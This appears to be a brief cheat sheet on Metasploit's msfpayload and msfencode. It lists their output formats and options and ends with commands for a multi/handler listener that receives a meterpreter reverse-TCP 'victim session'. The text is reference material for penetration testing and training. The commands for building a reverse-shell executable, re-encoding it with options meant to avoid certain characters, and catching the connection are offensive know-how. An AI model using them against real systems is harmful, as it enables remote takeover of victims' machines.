Packaging the attack payload: msfpayload

Usage: msfpayload [<options>] <payload> [var=val] <output format>

Output formats:
  Summary  summary and options of the payload
  C        C language
  Perl     Perl
  Ruby     Ruby
  Raw      raw; allows the payload to be piped into msfencode and other tools
  Js       JavaScript
  eXe      Windows executable
  Dll      DLL
  Vba      VBA
  War      WAR package

Examples:
  msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter
  msfpayload windows/meterpreter/reverse_tcp O        (O: show options)
  msfpayload [payload] X > xx.exe

Encoding the payload: msfencode

Usage: msfencode <options>

OPTIONS:
  -a   The architecture to encode as
  -b   The list of characters to avoid, e.g. '\x00\xff'
  -c   The number of times to encode the data
  -d   Specify the directory in which to look for EXE templates
  -e   The encoder to use
  -h   Help banner
  -i   Encode the contents of the supplied file path
  -k   Keep template working; run payload in new thread (use with -x)
  -l   List available encoders
  -m   Specifies an additional module search path
  -n   Dump encoder information
  -o   The output file
  -p   The platform to encode for
  -s   The maximum size of the encoded data
  -t   The output format: bash, c, csharp, dw, dword, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript, asp, aspx, aspx-exe, dll, elf, exe, exe-only, exe-service, exe-small, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, vba, vba-exe, vbs, war
  -v   Increase verbosity
  -x   Specify an alternate executable template

Receiving the victim session

  msf > use exploit/multi/handler
  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  msf exploit(handler) > set LHOST x.x.x.x
  msf exploit(handler) > set LPORT xxxx
  msf exploit(handler) > exploit
  [*] Started reverse handler on x.x.x.x:xxxx
  [*] Starting the payload handler...